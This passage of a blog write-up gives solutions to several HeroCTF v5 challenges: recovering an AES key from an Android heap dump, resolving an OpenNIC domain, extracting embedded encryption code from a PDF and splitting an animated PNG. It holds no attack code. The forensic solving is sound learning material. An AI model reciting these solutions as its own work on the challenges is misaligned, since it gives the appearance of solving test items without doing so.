rel=\"nofollow noopener noreferrer\">Quickly capturing hprof files for Android’s Memory Analyzer - Qiita</a></p>\n<p>So I converted the file format with the following command.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">hprof-conv heap.hprof heap-conv.hprof</code></pre></div>\n<p>Next, I launched MemoryAnalyzer.exe and analyzed the converted file.</p>\n<p>On the first screen, I pressed the blue button to create a Histogram.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 508px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/6f1ee6945dded030b849044a3fe7e84e/2fd48/image-20230517231258813.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 63.74999999999999%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACFUlEQVQ4y3VTy27bMBDUB1W2LNt6kxRJSdTDQRIggFP00GP//wumsxTc5hAfFqTM3dnZ2XHiPv7A+BGd7qF6i7ozKKsGwzDB+f9hHU83wvPumW+dxMC8AM/c/QxILmZD2hBwfcX9128stw3z2zuG9Y0NPFTX4bZ4vK4aynpUTYtzoTAHj20Z8SM94Hw+I8tOOJ1OSAyLmqZD3/cYnIO3Btb26DoFrTV6Y2C0gncahve2bZFfalyLit8a2fEYgZTSfFNIpts75u0FfgpQxsJwFDcGjGGB5WjzesM4r7D8LSwbpnlBP8yotdtrKFMphCiF1CbbtiLMM/w4xXGqtoMdxljYaRPPeVnje+98/A4MRbZZfkZ+LShByfMaIwmfgaJbVGUZqWdZhqauOaLD5XJBzfs4jlESeRcZxmFAwfw0TXE8HHD4Eom7S2fRrEOe5xQ55XnmJgdc2bFg9xA4gXcEzNFQwxACnVDtgNTwayTuk7P3JjIRwDRu7UIb7IASwtBa+49hoHbS6HtAMvSDh1YqFqSH3QZfAeXuvY8MFfMmNnjO8C6mtTFRCgRQRhZGO2CBiYyc2xmKbUTfoiieAYrje7Tc8Cl/AOYEcBFQFiN6SgMxb0sXyFLK8snIw88AQzN7WuLRVZiIiYWdNLEEF0ApqKo6LqWi5t8C2o8Biv8ETafLqLL64zGLEgjDB1sJKSjLKmr6DPAvOZ+3nRHxD7IAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/6f1ee6945dded030b849044a3fe7e84e/8ac56/image-20230517231258813.webp 240w,\n/static/6f1ee6945dded030b849044a3fe7e84e/d3be9/image-20230517231258813.webp 480w,\n/static/6f1ee6945dded030b849044a3fe7e84e/7b066/image-20230517231258813.webp 508w\"\n              sizes=\"(max-width: 508px) 100vw, 508px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/6f1ee6945dded030b849044a3fe7e84e/8ff5a/image-20230517231258813.png 240w,\n/static/6f1ee6945dded030b849044a3fe7e84e/e85cb/image-20230517231258813.png 480w,\n/static/6f1ee6945dded030b849044a3fe7e84e/2fd48/image-20230517231258813.png 508w\"\n            sizes=\"(max-width: 508px) 100vw, 508px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/6f1ee6945dded030b849044a3fe7e84e/2fd48/image-20230517231258813.png\"\n            alt=\"image-20230517231258813\"\n            title=\"image-20230517231258813\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Here, the objects in the dump are grouped by class.</p>\n<p>When I listed the classes, I found one with the very suspicious-looking name <code class=\"language-text\">class com.hero.cryptedsecret.AESEncrypt @ 0x131efdf8</code>.</p>\n<p>I right-clicked it and used [List Object] to inspect <code class=\"language-text\">Incoming, Outgoing References</code> respectively.</p>\n<p>Reference: <a href=\"https://dzone.com/articles/eclipse-mat-incoming-outgoing-references\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Eclipse MAT — Incoming, Outgoing References - DZone</a></p>\n<p>Here, <code class=\"language-text\">Incoming References</code> refers to the objects that hold references to that object.</p>\n<p>On the other hand, <code class=\"language-text\">Outgoing References</code> refers to the references held by that object.</p>\n<p>In this case, when I listed the <code class=\"language-text\">Outgoing References</code> held by the <code class=\"language-text\">com.hero.cryptedsecret.AESEncrypt</code> class, I found <code class=\"language-text\">message</code> and <code class=\"language-text\">KEY</code> objects as shown below.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 704px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/390a245a878ee4ede8aa41d10e54678a/5ebd7/image-20230517231830794.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 44.583333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABsUlEQVQoz1VRy27bMBDUjxQ59FQUEilZb4kUKVNvOy4QozaKtOf+Q9M06I9Pd9k0cA/DWS7I2dndwM0HTPOGh8sVh/tPmJYD5vWIZTu+cT+smNYTvVsxjg7aWOjOQGkNRdwZg7KsKN8jmFd6vCxotEHVKtQMpYn1KysUdYOybj3yqoYiwWGaMc4LrBuo8Ib9MKJsWgTbOmPbNrRti763sFRNU2UPpdB1GmVRkIMCRZETl9glCYQQyLMMcSyRxLF/E0URgpSSl8sZxlpv3TlHIh0JdjB053y/31OxHpZiQ+4y+hOGIXFOgjGElL4Q5wI+3ODQs6BWaJsaFblh1FVJlXOKy7ccIyGH/M+LkVMG57xDbuN4ukeleyjr0Jo9zaJD2f5FpQxqbT3+3VNyJkSENE29qCSwaxYOBprb6dt3yK+/EX15hnh8QXh9wofLEz4Sh9cfeP/5GXfnX7h7+Il35xdk2yMmZzHTMsdx9FhpuTyugIfNG9PkrqdNVbTdtKhom80NWmSvyGuFJM0gpcBut/MOGRxLmmUghPR2izz3W5PUiiTrt4jl/+B2eV7cIvNt/AcOozN4KIU2ywAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/390a245a878ee4ede8aa41d10e54678a/8ac56/image-20230517231830794.webp 240w,\n/static/390a245a878ee4ede8aa41d10e54678a/d3be9/image-20230517231830794.webp 480w,\n/static/390a245a878ee4ede8aa41d10e54678a/9a172/image-20230517231830794.webp 704w\"\n              sizes=\"(max-width: 704px) 100vw, 704px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/390a245a878ee4ede8aa41d10e54678a/8ff5a/image-20230517231830794.png 240w,\n/static/390a245a878ee4ede8aa41d10e54678a/e85cb/image-20230517231830794.png 480w,\n/static/390a245a878ee4ede8aa41d10e54678a/5ebd7/image-20230517231830794.png 704w\"\n            sizes=\"(max-width: 704px) 100vw, 704px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/390a245a878ee4ede8aa41d10e54678a/5ebd7/image-20230517231830794.png\"\n            alt=\"image-20230517231830794\"\n            title=\"image-20230517231830794\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Since the encryption mode turned out to be EBC, I was able to decrypt the flag using the obtained Key and message.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 425px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/40e42676a595547b1d53ec590d8159c8/2fbbf/image-20230517232636030.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 230.83333333333337%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAuCAYAAAAoaDnGAAAACXBIWXMAAAsTAAALEwEAmpwYAAAFaklEQVRIx61XS4/bVBjNz0FizYICS6iQEEsk1izYsmXBCnZAWVCJLkAqSIgVQqISgkHTIjqvjlqm0047M3lnktiO47ydxL5OfPjO9SOeJJ0+INKX7/pe++S7955zrpM7OnqE3//4E9vbOzh6eITNzVv4+/YWtiR2dnbx6PExNjY2sLt7B3fv3sPBwX3clrGbmzexI333/jmAO/Hg+QpTz0euVCrj8MFDFCWfndXxQEBP83nk80X9cE36Dg8faLB8voD9/X1s3voLLOTg/iHyhcJ5wF6/D9NsoW07sG0b3W4frZYDy2rptmlacm1jNptjHgIBM4Awjpl0egJEMILmut0eDMOC43TQbrfhdLoC0Ja2/ICEYZganA+oYAZfBTr4cNJmf1ohGwRt2W1YBBJAXnd7Up0AOZ1ojG3TslFvNNFomjoMqb4pwZxWOJ5MUanW9A2T6VTK93QeTyYYDofg+Hg8wWjk6uy6Y50n0u+6SZ8rVQZRhb6gDuTB6dTDf/nM5/MIkMjJJwzDFwr50psWAapA75ce+D8q5C7NBWw+z0R8HYZLfeFSO3Ofr5SsvYdcsjvTmEtJkFuTqbRlLDvu+YvxLP+4ebpCbnmxWILZNFCr1VE/a0iuodlo4E7RxclpCWWqqN4QepiipoY8uPiRbNa0IaHrcjNJbIkiyDe2m0KjttPVSuGPkuhmnLMA3tIMciRtpVIV2Tm6iqpwkgBVzU1Dt2u1M63zcrkqqrFXlidbqd6U/mCIoRB3QZ9FTvY+zFBrNptlYq6DQlgQm4CiAAKs2+3lnY2pp2MFcDgaodcf6ApZKTXc6w91H4N9jOQ6Gl+0V6ZsWbLLhbKsVUuvWblcEQ9saB+k/9EMuJ5sVyo10D9PxSvLpYq0K5p7pBdzOmWW646j4NRpAO54rG/S/TI+EyWEqTxXp5yaA786sV11ZRo2fVGCmVMldRwZD+QByovA2RxFKOOzCDCpbERbEraPaEmSIzNdmOg6qqyLHNeISqBayMeCZPKOkkvX5xmAUqVw7pxa1iR4TrD/eSLdFCXTouQ4zcSGznndik+u901uogYcyxEYrZEXT9GLnCPmFdtJ/9Rb0OOJ0jMMAyfHedSqNc0rrh/Xk9rNn5yiEvOyIjouCf+OH59qbq61PK4hG+TecDSOVTFKVcPMivSCs7rY8+iJEQMWkVaolPDQEdsSr7NMA1ROU87iplROK5vEa/u0zyw5AnquD6MnG9NXMHsBum6Q4Z9aO7ULefjJDYXXryi8e03h8lWF976Tg38kU/KfjX8ra/jhTwovfRrgra8DvPFVoMGdobx2qPhMiW9OdnfZqZddO3dYD/DLgcJvRzPceDjHVknWwo/kxhejRHoke/JOs04hKaBjNdE6K8KScMwqasUTTR/K8OQkr2mzF78b7u3tazqp2AjWgedG7gQDocxQMo210xukVtYX9+E7TdZoSaVECCT9yiHFAZ5mpEq9YWjSntXFVIXgbCdBw+WBVhcTrsgYX7DYz2XRtDn/KrKq4YuC3pjV+TkeJoDP9Fl6/8kayArgi755pYDJlD2flMCFMQ+f4+0LoSL+UyM4d7gvhQaLLC5361Th222F7/cUru/GOY4f7kRjW0WFWXCxFJOx3PvXI+lRdoxXPo/yq18EuCTx8mcBPviRs5DjdqoulJ4m9kc/K1z6MsA71wK8/U2AN6/GIdq+LPm1KwE+/lUAQ18DPtUcrL6PQkuhaEtILrUl7CiX2wEK0m4PIxO92BziKSvfg2NbsC0DLdH1aCD/S8yGzsN+B512C4N+TyuFh1n4BIpxczTgRB9EHkZj+d/BkLbL/yCT+Ho8jf6rxPafGO/5WLjQv9YCtxPjHRVkAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/40e42676a595547b1d53ec590d8159c8/8ac56/image-20230517232636030.webp 240w,\n/static/40e42676a595547b1d53ec590d8159c8/8dc4f/image-20230517232636030.webp 425w\"\n              sizes=\"(max-width: 425px) 100vw, 425px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/40e42676a595547b1d53ec590d8159c8/8ff5a/image-20230517232636030.png 240w,\n/static/40e42676a595547b1d53ec590d8159c8/2fbbf/image-20230517232636030.png 425w\"\n            sizes=\"(max-width: 425px) 100vw, 425px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/40e42676a595547b1d53ec590d8159c8/2fbbf/image-20230517232636030.png\"\n            alt=\"image-20230517232636030\"\n            title=\"image-20230517232636030\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"windows-stands-for-loserforensic\" style=\"position:relative;\"><a href=\"#windows-stands-for-loserforensic\" aria-label=\"windows stands for loserforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Windows Stands For Loser(Forensic)</h2>\n<p>I ran out of energy, so I’ll review this one another day…</p>\n<p>Reference: <a href=\"https://github.com/HeroCTF/HeroCTF_v5/tree/main/Forensics/Windows_Stands_For_Loser\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">HeroCTF<em>v5/Forensics/Windows</em>Stands<em>For</em>Loser at main · HeroCTF/HeroCTF_v5 · GitHub</a></p>\n<h2 id=\"openpirateosint\" style=\"position:relative;\"><a href=\"#openpirateosint\" aria-label=\"openpirateosint permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>OpenPirate(OSINT)</h2>\n<p>This challenge was to access <code class=\"language-text\">hero.pirate</code>.</p>\n<p>Apparently, the <code class=\"language-text\">pirate</code> domain is managed by OpenNIC.</p>\n<p>So, using the following as a reference, I configured an OpenNIC public server as my DNS resolver.</p>\n<p>Reference: <a href=\"https://wiki.archlinux.jp/index.php/%E4%BB%A3%E6%9B%BF_DNS_%E3%82%B5%E3%83%BC%E3%83%93%E3%82%B9\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Alternative DNS services - ArchWiki</a></p>\n<p>After that, I was able to access <code class=\"language-text\">hero.pirate</code> and recover the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 852px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/01ce7764acf1156dc3d09b52c080f184/47ff6/image-20230514151624947.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 26.666666666666668%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAx0lEQVQY0zWQ/Q5DMBTFPQcpG/6dlUnQbzWrBBvv/zI7Kn5N7705uSf3tgGlJTvoGONITdOkaZrn+e12j6IwugjDEHqWZYSQiCQkTpI4Dl6etm1N3yutldLGmPE9InZdxy5Q28EOwyCFYNIIZYTgQeXNVVU9Lx6eoiioB0pZlqdeeOihUIgBbl3XiJg5uck5t64Ljvs4pZS1FpLW+rdt33WZ53nfNyyIYXAd5nMyNtdKSymt7dHNOT+3RY2PQMSThJRI6EQ/XH82vT8v0T3frAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/01ce7764acf1156dc3d09b52c080f184/8ac56/image-20230514151624947.webp 240w,\n/static/01ce7764acf1156dc3d09b52c080f184/d3be9/image-20230514151624947.webp 480w,\n/static/01ce7764acf1156dc3d09b52c080f184/39392/image-20230514151624947.webp 852w\"\n              sizes=\"(max-width: 852px) 100vw, 852px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/01ce7764acf1156dc3d09b52c080f184/8ff5a/image-20230514151624947.png 240w,\n/static/01ce7764acf1156dc3d09b52c080f184/e85cb/image-20230514151624947.png 480w,\n/static/01ce7764acf1156dc3d09b52c080f184/47ff6/image-20230514151624947.png 852w\"\n            sizes=\"(max-width: 852px) 100vw, 852px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/01ce7764acf1156dc3d09b52c080f184/47ff6/image-20230514151624947.png\"\n            alt=\"image-20230514151624947\"\n            title=\"image-20230514151624947\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"pdf-messstego\" style=\"position:relative;\"><a href=\"#pdf-messstego\" aria-label=\"pdf messstego permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>PDF-Mess(Stego)</h2>\n<blockquote>\n<p>This file seems to be a simple copy and paste from wikipedia. It would be necessary to dig a little deeper…</p>\n<p>Good luck!</p>\n<p>Format : Hero{}\nAuthor : Thibz</p>\n</blockquote>\n<p>When I broke the PDF file into objects with <a href=\"https://github.com/dzzie/pdfstreamdumper\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">pdfstreamdumper</a>, I found the following code.</p>\n<div class=\"gatsby-highlight\" data-language=\"javascript\"><pre class=\"language-javascript\"><code class=\"language-javascript\"><span class=\"token keyword\">const</span> CryptoJS<span class=\"token operator\">=</span><span class=\"token function\">require</span><span class=\"token punctuation\">(</span><span class=\"token string\">'crypto-js'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>key<span class=\"token operator\">=</span><span class=\"token string\">'3d3067e197cf4d0a'</span><span class=\"token punctuation\">,</span>ciphertext<span class=\"token operator\">=</span>CryptoJS<span class=\"token punctuation\">[</span><span class=\"token string\">'AES'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span><span class=\"token string\">'encrypt'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">(</span>message<span class=\"token punctuation\">,</span>key<span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token string\">'toString'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>cipher<span class=\"token operator\">=</span><span class=\"token string\">'U2FsdGVkX1+2k+cHVHn/CMkXGGDmb0DpmShxtTfwNnMr9dU1I6/GQI/iYWEexsod'</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>If you simply decrypt the AES ciphertext above, you can recover the flag.</p>\n<h2 id=\"png-gstego\" style=\"position:relative;\"><a href=\"#png-gstego\" aria-label=\"png gstego permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>PNG-G(Stego)</h2>\n<blockquote>\n<p>Don’t let appearances fool you.</p>\n<p>Good luck!</p>\n<p>Format : Hero{}\nAuthor : Thibz</p>\n</blockquote>\n<p>The provided challenge file is an image named <code class=\"language-text\">pngg.png</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 506px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/703b6bb6d0b98404056a34769c7029ba/29f4e/image-20230517233603580.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 100%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAAFgElEQVQ4yx2U2VPb1xmGdeFJxjbgGGMhNoHNEmOxWAgEEQiEFhAIJIGsFQECLAuZzQaxCWR2glmNYuIN141jx4lJcSfLTJu0trGTTMZJ2rrTTNt0xm2mM+1FL/onPP2lF9/MmTlnnvf9znm/I/ru+ff4W6yc93tpNryBvkzGs6/+wN4Xv2f7xs+YDnVzeWGG29ElVid6CTrqGWnSs+Uy0qsrJNSoYsBYSkthGjV5GYj+8fI/9PlsXDjjoUF9imp5Op/9+jG/e/GSX338KT/fnGJtZpybS2Euzw2zciHAXUFgqc2CqzyTcMDL/OA5morSaSzKQvTBu/fwWqqYDw+iU+TiadDz4z//y5//9i+ePnrG1eVJdnd+ycZMmPFuL29Pj/Kb1QV2z3cx1VjKqk3HhrOWCfVJgiU5iLa33sKildNpVVGYFou5UsHTvee8+Mu/2bm/w93ZIN8+2WNrbYX5UJDZoJdo6Bwfz4xxy6nhrYCHrRYTy9X5DBZnI3rv7vvYDCV0u+qRJcdiN6h4vPshf3r6W77cvcPLbQd/vTfM1cVJVqdCrPX5uNRpZ8imp6dByc21JWFvjq7qQprzpYiePPkWm15Bt9vEieQ4+q1l/PjRMi8fLPHD9TN8v2Li8/Ve7i2FWBfucmMuwtW5KSbManqElnfnJ3k4OcJZgaHMSUT0eO87jGWZtDfrSRfHMm5X8fdoK8/XuvnjWis/vGnmSTTEnaVRonNhri9OsTjcy8xpPb1GBfMdNi45ajijO4XzJ4eXL82jzkvAVVOMNOEAK94qXix18fWCj0eTNnaHLXwT7eaTjRHuRteF9qa55TMTaarEXyNnrMPKxZ52OvXFaE5IEAUcBjQFYtz1FaSK47jiLuFZxMXOoIuHQ3Y+Crt4EF3m82iEL1YG2bnQyboQmemWeroMBUz4LLw7PUZnk5aCY/GIFqYj1CqPMdDh4rgkjkVnJQ9H3WwNeHk/5OTxmIW9OT+PZtr5+qKDr2YDXA/aeae/naG6It4cPcfiWTfNZdmUZ4kRXdvcxPQTsFFw+No+Ru0arvba2B5yca3fwU2/gc8ibTy4GOB+uINf9DVxpdXElbNO+gz5XBnrZa7Djrsil3zpYURTkWl0eWK6dHKkkhgG7Vrei3SxO9vG9oCVG4FqPhyxcaunkY1+D5vzM4R9zYwIZa/I5oxRiUOnwKyWIUt9DdFsfxulWYexaYuFVz5Ih7WaaNDC/X4jl7sq2OxSc/u8mWuBBm4PeLg+EuCipxafSYVWnoxaJqYi9ygGeRq5QuxEwy49xcePYFHl/x/oFMCT3jqWO+qZtZey3qrmTq+ZG/56bg+2sjM1wLxNg6syj/LcBIrSYyhI2U9J5iHypILDvmY16sIU3FoZypMS6svyGPJaWOi0Mt4g55JbzapHw7C5lLC9mhvDQcYcRkxCdtVCOvLTYsiV7OeUNJbXkwSH3eYSJizHmGjKQp2fgkOVS6C2hBl3DT5NHn5BKFCn5GzDG4y3WtjsaaHDWIauSEpB2kGOx79K9pFXkSUdIFMcg0hXkIqnOBFnWQoFx8WcVmbRKcx2v/Df+U1FOCoyGG3VMNSupU+oMZ+QP0FQmXNUgMQg3r+PjPhXUKTEIJMILVfkiKnMisdfmkGJNB5PlYwhdzkhb7nw4nkEa6WEXdmEW3OItOcw3qYkWCfjtEJKaUYCybH7OfjKPsoT46hKFyalsTAZQ64EhyKJ06eSaKnMxF0lwauTYio8iirzMDWyQ1iVhwSxJHpMUhxaKdbCVIxZEqQC8ETcARpliWiyBWBxphh5ZjKKtHjqSo/h1ksxFh3BqU6lVsin9oSY+pPxmORH0RaLhYkQSiWsTyZQnp2IPD0BReoRjK8LZ3Mk/A8pYjl4S5clzgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/703b6bb6d0b98404056a34769c7029ba/8ac56/image-20230517233603580.webp 240w,\n/static/703b6bb6d0b98404056a34769c7029ba/d3be9/image-20230517233603580.webp 480w,\n/static/703b6bb6d0b98404056a34769c7029ba/6b97b/image-20230517233603580.webp 506w\"\n              sizes=\"(max-width: 506px) 100vw, 506px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/703b6bb6d0b98404056a34769c7029ba/8ff5a/image-20230517233603580.png 240w,\n/static/703b6bb6d0b98404056a34769c7029ba/e85cb/image-20230517233603580.png 480w,\n/static/703b6bb6d0b98404056a34769c7029ba/29f4e/image-20230517233603580.png 506w\"\n            sizes=\"(max-width: 506px) 100vw, 506px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/703b6bb6d0b98404056a34769c7029ba/29f4e/image-20230517233603580.png\"\n            alt=\"image-20230517233603580\"\n            title=\"image-20230517233603580\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Although the extension is png, when I checked the exif data I found that [File Type] was APNG.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">ExifTool Version Number         <span class=\"token builtin class-name\">:</span> <span class=\"token number\">12.40</span>\nFile Name                       <span class=\"token builtin class-name\">:</span> pngg.png\nDirectory                       <span class=\"token builtin class-name\">:</span> /home/ubuntu/Hacking/CTF/2023/heroctf/Stego/PNG-G\nFile Size                       <span class=\"token builtin class-name\">:</span> <span class=\"token number\">500</span> KiB\nFile Modification Date/Time     <span class=\"token builtin class-name\">:</span> <span class=\"token number\">2023</span>:05:14 00:55:20+09:00\nFile Access Date/Time           <span class=\"token builtin class-name\">:</span> <span class=\"token number\">2023</span>:05:17 <span class=\"token number\">22</span>:09:16+09:00\nFile Inode Change Date/Time     <span class=\"token builtin class-name\">:</span> <span class=\"token number\">2023</span>:05:14 00:55:20+09:00\nFile Permissions                <span class=\"token builtin class-name\">:</span> -rw-r--r--\nFile Type                       <span class=\"token builtin class-name\">:</span> APNG\nFile Type Extension             <span class=\"token builtin class-name\">:</span> png</code></pre></div>\n<p>So this image appears to be animated.</p>\n<p>So I used <a href=\"https://sourceforge.net/projects/apngdis/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">APNG Disassembler download | SourceForge.net</a> to split the APNG file into images, and I was able to obtain an image file containing the flag as shown below.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 506px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/f6cbe5847fad49abb24c9f31bf03967a/29f4e/image-20230517233841644.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 101.25%; position: relative; bottom: 0; left: 0; background-image: 